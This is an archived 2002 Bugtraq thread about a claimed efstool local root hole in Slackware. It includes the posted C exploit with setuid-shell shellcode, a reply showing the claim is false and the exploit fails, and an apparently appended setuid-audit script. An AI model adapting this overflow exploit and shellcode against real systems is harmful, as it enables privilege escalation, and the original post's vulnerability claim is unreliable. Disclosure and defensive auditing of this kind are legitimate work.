75261 2002-09-12 02:27 /15 lines/ Cloud Ass <cloudass@antionline.org>
Imported: 2002-09-12 02:27 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <1471>
Subject: efstool slackware 7.1 local root exploit exploit included
------------------------------------------------------------
There exists a local root in slackware 7.1 in the efstool package, here is
an exploit. Quick fix just chmod efstool -s. Enough said, any questions feel
free to e-mail me back.
(75261) /Cloud Ass <cloudass@antionline.org>/(Reflowed)
Attachment (application/octet-stream) in text 75262

75262 2002-09-12 02:27 /63 lines/ Cloud Ass <cloudass@antionline.org>
Attachment filename: "efstool.c"
Imported: 2002-09-12 02:27 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <1472>
Attachment (text/plain) to text 75261
Subject: Attachment (efstool.c) to: efstool slackware 7.1 local root exploit exploit included
------------------------------------------------------------
/* efstool.c - efstool/bof simple overflow in efstool,
 *
 *
 * This code is published property of CloudAss, you may
 * duplicate this in any shape or form without prior written
 * permission from CloudAss.
 *
 * Bug discovered by ntfx, just figured I'd code a decent
 * exploit for it.
 *
 *
 * DISCLAIMER - I am in no way affiliated with ntfx or any members of
 * soldierx or legion2002 security.
 *
 * Usage: ./efsroot offset - bruteforce if necessary
 *
 * Bug is pretty stupid, and simple, I have yet to see it give root.
 * efstool is not +s on slackware 8.0 , it should spawn a shell
 * regardless.
 *
 * (C) COPYRIGHT CloudAss , 2002
 * all rights reserved
 ***********************************************************************
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>   /* execl() */

#define SIZE 3000
#define NOP 0x90
#define PATH "/opt/gnome/bin/efstool"

//--------------------------------------------------
long get_esp(void){ __asm__("movl %esp,%eax\n");}
//--------------------------------------------------

char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[])
{
  char buffer[SIZE];
  long retaddr, offset;
  int i;

  offset = atoi(argv[1]);
  retaddr = get_esp() + offset;

  for(i=0; i < SIZE; i+=4)
    *(long *)&buffer[i] = retaddr;

  for(i=0; i < strlen(shellcode); i++)
    *(buffer+i) = NOP;

  memcpy(buffer+i, shellcode, strlen(shellcode));

  execl(PATH, "efstool", buffer, 0);
  return 0;
}
(75262) /Cloud Ass <cloudass@antionline.org>/-------

75342 2002-09-12 18:04 /64 lines/ Jeffrey Denton <dentonj@c2i2.com>
Imported: 2002-09-12 18:04 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <1480>
Subject: Re: efstool slackware 7.1 local root exploit exploit included
------------------------------------------------------------
On Tue, 10 Sep 2002, Cloud Ass wrote:

> There exists a local root in slackware 7.1 in the efstool package, here is
> an exploit. Quick fix just chmod efstool -s. Enough said, any questions feel
> free to e-mail me back.

That's actually kind of interesting, since Slackware 7.1 and previous
versions didn't install efstool or bonobo. Each version of Slackware has
a MANIFEST.gz file which lists everything that is installed during a full
install.
The following was performed on a Slackware 8.1 system:

# grep efstool /var/log/packages/*
/var/log/packages/bonobo-1.0.20-i386-1:36:usr/bin/efstool
# ls -l /usr/bin/efstool
-rwxr-xr-x    1 root     bin         14308 May  5 18:44 /usr/bin/efstool*
# ncftpget ftp://ftp.slackware.com/pub/slackware/slackware-7.1/slakware/MANIFEST.gz
MANIFEST.gz:                                   766.91 kB    4.45 kB/s
# zgrep bonobo MANIFEST.gz
33702:-rw-r--r-- root/root      5279 2000-05-30 01:37 usr/share/glade/gnome/gnome-bonobo-check.m4
# zgrep efstool MANIFEST.gz
#

Compare with Slackware 8.0 and 8.1:

# ncftpget ftp://ftp.slackware.com/pub/slackware/slackware-8.0/slakware/MANIFEST.gz
MANIFEST.gz:                                     1.37 MB    4.51 kB/s
# zgrep efstool MANIFEST.gz
36086:-rwxr-xr-x root/root     11224 2001-05-20 17:06 opt/gnome/bin/efstool
# ncftpget ftp://ftp.slackware.com/pub/slackware/slackware-8.1/slackware/MANIFEST.gz
MANIFEST.gz:                                     1.56 MB    4.37 kB/s
# zgrep efstool MANIFEST.gz
35115:-rwxr-xr-x root/bin      14308 2002-05-05 18:44:05 usr/bin/efstool

After changing the path to efstool in efstool.c, I ran the exploit on
Slackware 8.1.

$ gcc -o efstool_exploit efstool.c
$ ./efstool_exploit
Segmentation fault
$

Interesting, but it's hardly a root exploit since efstool is not suid. And
claiming that there is a local root exploit in Slackware 7.1 is just plain
wrong.

Enjoy

dentonj
(75342) /Jeffrey Denton <dentonj@c2i2.com>/(Reflowed)
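The checks Denton ran by hand (which package log claims the binary, whether it is setuid) and the `chmod -s` quick fix from the original post can be scripted so the same claim can be verified on any host. This is an added example, not code from either poster; the `/var/log/packages` layout, the `efstool` path and the temporary test file are assumptions.

```sh
#!/bin/sh
# Added example: audit a binary for setuid/setgid bits the way the thread
# checks efstool, and optionally strip them (the "chmod -s" quick fix).

# Return 0 if FILE carries the setuid or setgid bit, 1 if not, 2 if missing.
has_suid_sgid() {
    f="$1"
    [ -e "$f" ] || return 2
    # test -u / -g check the set-user-id / set-group-id bits (POSIX test(1)).
    if [ -u "$f" ] || [ -g "$f" ]; then
        return 0
    fi
    return 1
}

# Print the Slackware package log(s) that list FILE (path relative to /).
# Assumption: package logs live in /var/log/packages, one file path per line.
owning_packages() {
    f="${1#/}"
    pkglog="${2:-/var/log/packages}"
    [ -d "$pkglog" ] || return 1
    grep -lxF -- "$f" "$pkglog"/* 2>/dev/null | sed 's#.*/##'
}

# Strip setuid/setgid from FILE; return 0 only if neither bit remains.
strip_suid_sgid() {
    f="$1"
    chmod u-s,g-s "$f" || return 1
    ! has_suid_sgid "$f"
}

# One human-readable audit line for FILE.
audit() {
    f="$1"
    if has_suid_sgid "$f"; then
        printf '%s: setuid/setgid set, owner %s, packages: %s\n' \
            "$f" "$(ls -ld "$f" | awk '{print $3}')" \
            "$(owning_packages "$f" | tr '\n' ' ')"
    else
        printf '%s: no setuid/setgid bit (or not installed)\n' "$f"
    fi
}

audit /usr/bin/efstool
```

On the Slackware 8.1 box in the thread this reports no setuid bit, which is exactly why the posted exploit could never have yielded root there.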